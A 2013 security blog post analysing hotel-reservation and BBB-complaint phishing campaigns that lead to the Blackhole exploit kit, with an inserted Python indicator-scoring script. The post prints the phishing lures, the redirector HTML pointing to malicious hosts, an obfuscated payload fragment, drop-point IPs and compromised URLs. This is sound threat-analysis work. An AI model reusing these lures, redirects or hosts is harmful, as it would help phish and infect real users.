Wednesday, June 19, 2013

Hotel Registration Phishing Campaign with AutoClerk(?)

This particular campaign uses the "shock and awe" billing technique to create urgency, and it follows predictable Blackhole techniques.
Also spotted on DSL Reports.


Subject:   Your reservation at HOTEL UNION SQUARE
From:   "Reservations" <reservations@m.personalityhotelsmail.net>
Date:   Wed, June 19, 2013 12:39 pm
Priority:   Normal

Header information:
X-Mailer: AutoClerk <--- Whoa. Stop.
Let's dive in:
http://www.autoclerk.com/news/autoclerk-introduces-emarketing-to-its-suite-of-products-and-services
Autoclerk is a property management system that provides eMarketing to Hotels.
http://www.autoclerk.com/hotel-emarketing

^^

Content-Type: multipart/alternative; <-- Plain text and html elements k.
X-Spam-Status: No, score=5.8 <--- Scored 5.8 and still not flagged as spam. Not close enough.



Sent to you from Copenhagen, because clearly that's where Hotel Union Square is... not.
The payload uses a refresh method to immediately redirect you. Nothing new but we can still use this for more information.

(html>(CR)(LF)
(title>HOTEL·UNION·SQUARE·is·loading...(/title>(CR)(LF)
(script·type="text/javascript">(CR)(LF)
(!--(CR)(LF)
location.replace("http://winne2000.net/news/enough-advise.php");(CR)(LF)
//-->(CR)(LF)
(/script>(CR)(LF)
(noscript>(CR)(LF)
(meta·http-equiv="refresh"·content="0;·url=http://winne2000.net/news/enough-advise.php">(CR)(LF)
(/noscript>(CR)(LF)
(CR)(LF)
(/head>(CR)(LF)
(CR)(LF)
(h1>You·will·be·redirected·to·process(/h1>(CR)(LF)
(CR)(LF)
(CR)(LF)
(h4·style="color:#364dbc;">We·must·complete·few·security·checks·to·show·your·transfer·details:(/h4>(CR)(LF)
(CR)(LF)
(h3>Be·sure·you·have·a·transfer·reference·ID.(br·/>You·will·be·asked·to·enter·it·after·we·check·the·link.(br>(br>Important:·Please·be·advised·that·calls·to·and·from·your·wire·service·team·may·be·monitored·or·recorded.(br·/>(/h3>(CR)(LF)
(CR)(LF)
(h3>Redirecting·to·Complain·details...·Please·wait...(/h3>(CR)(LF)

And the payload begins with:

<style>b,div{color:#fff;}</style><script>function vq(){s="";zzz();az=21;try{caewbtew=~312;}catch(vava){az=0;}

Let's go deeper


The caewbtew=~ string at the entry point is consistent with the FedEx, American Airlines, DHL and PayPal campaigns, with the same obfuscation techniques that follow. Oh yes, also the BBB campaign I looked at here. There are two observed variants, one with catch(vava) and one with catch(qw). This is some lovely stuff when coupled with some other indicators and I've used it very successfully in the past.

This string has also been spotted in other compromised WordPress sites, about 860 indexed in Google.


Which also contained the string:
Redirecting to Complain details... Please wait...

Something like 860 hits, the same as the BBB campaign.
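As an added example (not code from the original post), here is a small Python scoring function that looks for the traits both landing pages share: the "is loading..." title, the JavaScript redirect paired with the same URL in a noscript meta refresh, the two lure strings, and the caewbtew=~ entry point with either observed catch() name. The sample pages, the landing.example host and the score thresholds are constructed for the example.

```python
import re

# Indicators taken from the two Blackhole landing pages in the post.
TITLE_LOADING = re.compile(r"<title>[^<]*\bis loading\.\.\.</title>", re.I)
JS_REDIRECT = re.compile(r"""location\.replace\(\s*["']([^"']+)["']\s*\)""", re.I)
META_REFRESH = re.compile(r"""http-equiv=["']refresh["'][^>]*?url=([^"'>\s]+)""", re.I)
# Entry point of the obfuscated script: try{caewbtew=~NNN;}catch(<name>){...}
ENTRY_POINT = re.compile(r"try\{caewbtew=~\d+;\}catch\((\w+)\)")
KNOWN_CATCH_NAMES = {"vava", "qw"}  # the two variants the post observed
LURE_STRINGS = ("You will be redirected to process",
                "Redirecting to Complain details... Please wait...")

def inspect_html(html):
    """Score one HTML document against the landing-page traits described above.
    Returns (score, hits, redirect_urls); score >= 3 is worth an analyst's look."""
    score, hits, urls = 0, [], set()
    if TITLE_LOADING.search(html):
        score += 1
        hits.append("title ends in 'is loading...'")
    js, meta = JS_REDIRECT.search(html), META_REFRESH.search(html)
    urls.update(m.group(1) for m in (js, meta) if m)
    # Both pages paired a JS redirect with a <noscript> meta refresh to one URL.
    if js and meta and js.group(1) == meta.group(1):
        score += 2
        hits.append("script + noscript redirect to the same URL")
    for lure in LURE_STRINGS:
        if lure in html:
            score += 1
            hits.append("lure text: " + lure)
    ep = ENTRY_POINT.search(html)
    if ep:
        score += 3 if ep.group(1) in KNOWN_CATCH_NAMES else 2
        hits.append("Blackhole entry point, catch(%s)" % ep.group(1))
    return score, hits, urls

# Constructed samples: a redirector shaped like the hotel page, an exploit-kit
# page opening with the post's script fragment, and a benign self-redirect.
HOTEL_PAGE = """<html><title>HOTEL UNION SQUARE is loading...</title>
<script type="text/javascript"><!--
location.replace("http://landing.example/news/enough-advise.php");
//--></script><noscript>
<meta http-equiv="refresh" content="0; url=http://landing.example/news/enough-advise.php">
</noscript></head><h1>You will be redirected to process</h1>
<h3>Redirecting to Complain details... Please wait...</h3></html>"""
EK_PAGE = ('<style>b,div{color:#fff;}</style><script>function vq(){s="";zzz();'
           'az=21;try{caewbtew=~312;}catch(vava){az=0;}')
BENIGN_PAGE = """<html><head><title>Moved</title>
<meta http-equiv="refresh" content="0; url=https://www.example.com/new/"></head></html>"""
```

The redirect URLs it pulls out are the next hop to pivot on, which is how the post ties the hotel page to the BBB page.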

Proving once again that nothing beats a human security analyst:


I'm not going to rehash blackhole here. We know what's up. Evidence of a broader campaign below.



References:

Friday, June 7, 2013

BBB Phish Event - Blackhole - ZeroAccess

EMAIL

The Better Business Bureau has been filed the above mentioned reclamation from one of your clients in respect of their dealings with you. The detailed description of the consumer's anxiety are available by clicking the link below. Please give attention to this issue and notify us about your mind as soon as possible.

We politely ask you to overview the <LINK>GRIEVANCE REPORT<LINK> to meet on this complaint.

We are looking forward to your prompt response.

Best regards
Tristan Lewis
Dispute Councilor
Better Business Bureau

==============HTML====================

GET /bbb.html HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding:
Host: speedgarage.com.ua
Connection: Keep-Alive

HTTP/1.0 200 OK
Server: nginx/1.1.10
Date: Fri, 07 Jun 2013 17:13:03 GMT
Content-Type: text/html
Content-Length: 738
Last-Modified: Fri, 07 Jun 2013 11:53:09 GMT
Accept-Ranges: bytes
Connection: keep-alive


(html>

(title>BBB is loading...(/title>

(script type="text/javascript">

(!--location.replace("http://pnpnews.net/news/readers-sections.php");

//-->


(/script>


(noscript>

(meta http-equiv="refresh" content="0; url=http://pnpnews.net/news/readers-sections.php">

(/noscript>

(/head>

(h1>You will be redirected to process(/h1>

(h3>Redirecting to Complain details... Please wait...(/h3>

location.replace("http://pnpnews.net/news/readers-sections.php");

"refresh" content="0; url=http://pnpnews.net/news/readers-sections.php




Payload: pnpnews.net

Exploit Kit: Blackhole

Snort Rules 

ET TROJAN Spoofed MSIE 7 User-Agent Likely Ponmocup
ET CURRENT_EVENTS SUSPICIOUS JAR Download by Java UA with non JAR EXT matches various EKs
ET INFO Packed Executable Download
ET CURRENT_EVENTS Blackhole request for Payload
ET CURRENT_EVENTS BlackHole EK JNLP request
ET CURRENT_EVENTS - Possible BlackHole request with decryption Base
ET TROJAN Pony Downloader check-in response STATUS-IMPORT-OK
ET TROJAN Known Trojan Downloader HTTP Library MSIE 5 Win98 seen with ZeuS
ET TROJAN Fareit/Pony Downloader Checkin 2
ET CURRENT_EVENTS DRIVEBY Blackhole - Payload Download - readme.exe
ET CURRENT_EVENTS DRIVEBY Blackhole - Payload Download - contacts.exe
ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (6)
ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (5)
ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (41)
ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (33)
ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (13)

Drop Points: 
88.191.130.98:8080

  • 8080/tcp open  http    nginx 1.0.10
  • 21/tcp   open     ftp          Pure-FTPd
  • 22/tcp   open     ssh          OpenSSH 5.3p1 Debian 3ubuntu7 (protocol 2.0)
  • 25/tcp   open     smtp         Postfix smtpd
  • 80/tcp   open     http         Apache httpd 2.2.14 ((Ubuntu))
  • 8080/tcp open     http         nginx 1.0.10
  • 8090/tcp open     http         nginx 1.2.6

213.214.74.5:8080 

  • 8080/tcp open  http         nginx 1.0.10
  • 21/tcp   open     ftp          ProFTPD 1.3.3d
  • 22/tcp   open     ssh          OpenSSH 5.8p1 Debian 1ubuntu3 (protocol 2.0)
  • 80/tcp   open     http         Apache httpd 2.2.17 ((Ubuntu))


      Disk Artifacts of Interest: 

      exp1.tmp.exe | VirusTotal Detected as: PSW.Generic | Fareit | Zero Access 30/47
      exp1.tmp
      exp2.tmp


      URLs Involved
      hxxp://carpenterpricebreaker.com/bbb.html
      hxxp://ecotopia.pl/bbb.html
      hxxp://gite-cantal-meandres.fr/bbb.html
      hxxp://ib-greb.de/bbb.html
      hxxp://intelaboratory.com/bbb.html
      hxxp://rentbaku.com/bbb.html
      hxxp://slavamoskovkin.ru/bbb.html
      hxxp://speedgarage.com.ua/bbb.html
      hxxp://vmoskalev.ru/bbb.html